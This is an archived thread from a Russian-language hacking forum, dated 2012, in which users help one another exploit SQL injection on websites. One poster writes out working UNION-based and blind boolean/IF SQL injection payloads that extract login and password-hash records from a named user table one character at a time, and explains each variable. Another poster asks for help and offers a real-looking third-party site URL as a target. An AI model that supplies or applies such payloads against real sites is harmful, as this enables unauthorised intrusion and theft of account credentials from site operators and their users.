HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21371  
Старый 29.09.2012, 17:02
m00c0w
Guest
Сообщений: n/a
Провел на форуме:
36927

Репутация: 5
По умолчанию

Цитата:
Сообщение от [c0de  
"]
[c0de] said:
Есть слепая blind sql инъекция
Проверил
test.ru/forum/viewtopic.php?id=1' and 2-1='1 true
test.ru/forum/viewtopic.php?id=1' and 2-1='2 false
Известно название таблицы, полей
Так же известно название таблицы с юзерами "users_am"
и наличие полей "id" , "login", "password"
Известен id и логин админа
Возникает вопрос, как достать хэш пароля?
в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.
mysql?
 
Ответить с цитированием

  #21372  
Старый 29.09.2012, 17:04
[c0de]
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

m00c0w

да
 
Ответить с цитированием

  #21373  
Старый 29.09.2012, 17:37
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от [c0de  
"]
[c0de] said:
Есть слепая blind sql инъекция
Проверил
test.ru/forum/viewtopic.php?id=1' and 2-1='1 true
test.ru/forum/viewtopic.php?id=1' and 2-1='2 false
Известно название таблицы, полей
Так же известно название таблицы с юзерами "users_am"
и наличие полей "id" , "login", "password"
Известен id и логин админа
Возникает вопрос, как достать хэш пароля?
в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.
test.ru/forum/viewtopic.php?id=1'+and+1=2+union+all+slelect+conc at(id,0x3a,login,0x3a,password)+from+users_am+limi t+0,1+and+1='1

А вообще если у тебя есть login и password - зачем тебе хэш ??
 
Ответить с цитированием

  #21374  
Старый 29.09.2012, 17:50
[c0de]
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

BigBear

Так нету пароля, известно только что поле есть password а там хэш пароля

Запрос не работает к сожалению. Страница меняется

Суть такая, проверял наличие таблиц, если такая есть => страница без изменений

Нету => пропадают стили, скрипты

В запросе пробелы где нужно убрал если что.

А куда запрос должен был то вывестись? Скуля то слепая
 
Ответить с цитированием

  #21375  
Старый 29.09.2012, 18:23
Unknown
Guest
Сообщений: n/a
Провел на форуме:
3098

Репутация: 3
По умолчанию

Цитата:
Сообщение от None  
В запросе пробелы где нужно убрал если что.
а

Цитата:
Сообщение от None  
+slelect+
исправил на select ?
 
Ответить с цитированием

  #21376  
Старый 29.09.2012, 18:28
[c0de]
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Red[S1]

да

Все равно не катит
 
Ответить с цитированием

  #21377  
Старый 29.09.2012, 19:38
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от [c0de  
"]
[c0de] said:
BigBear
Так нету пароля, известно только что поле есть password а там хэш пароля
Запрос не работает к сожалению. Страница меняется
Суть такая, проверял наличие таблиц, если такая есть => страница без изменений
Нету => пропадают стили, скрипты
В запросе пробелы где нужно убрал если что.
А куда запрос должен был то вывестись? Скуля то слепая
Да, с slelect очепятался, бывает =)

если блайнд то тут 2 вариант на выбор

Код:
Code:
test.ru/forum/viewtopic.php?id=1'+and+ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+0,1),1,1)>50+and+1='1
или

Код:
Code:
test.ru/forum/viewtopic.php?id=1+and+1=IF(ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+0,1),1,1)>50,1,2)+and+1='1
Цветом выделены динамические переменные

1ая отвечает за номер записи в бд users_am (по дефолту идёт считывание данных из 1-ой записи)

2ая отвечает за порядок извлекаемого символа из строки id:login: password (по дефолту идёт извлечение первого символа)

3ья отвечает за код ascii символа в десятичном формате (Dec), по нему будешь ориентироваться, какой символ стоит на каком месте

Если в процессе будешь получить НЕ ПУСТУЮ страницу - значит запрос получился верный.

То есть в id:login: password на {1} строке таблицы users_am на позиции {2} находится ascii символ {3}

Знаю, что сложнова-то для восприятия, но как мог так помог =)
 
Ответить с цитированием

  #21378  
Старый 29.09.2012, 20:06
Halahack
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by=1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?
 
Ответить с цитированием

  #21379  
Старый 29.09.2012, 20:11
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Halahack  
Halahack said:
нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by=1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?
К таким вопросам обычно прилагается ссылка на сайт для помощи.

(с) Телепаты в отпуске !!!
 
Ответить с цитированием

  #21380  
Старый 29.09.2012, 21:53
Halahack
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
К таким вопросам обычно прилагается ссылка на сайт для помощи.
(с) Телепаты в отпуске !!!
http://lonyung.com.cn/buy.php?id=`76
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ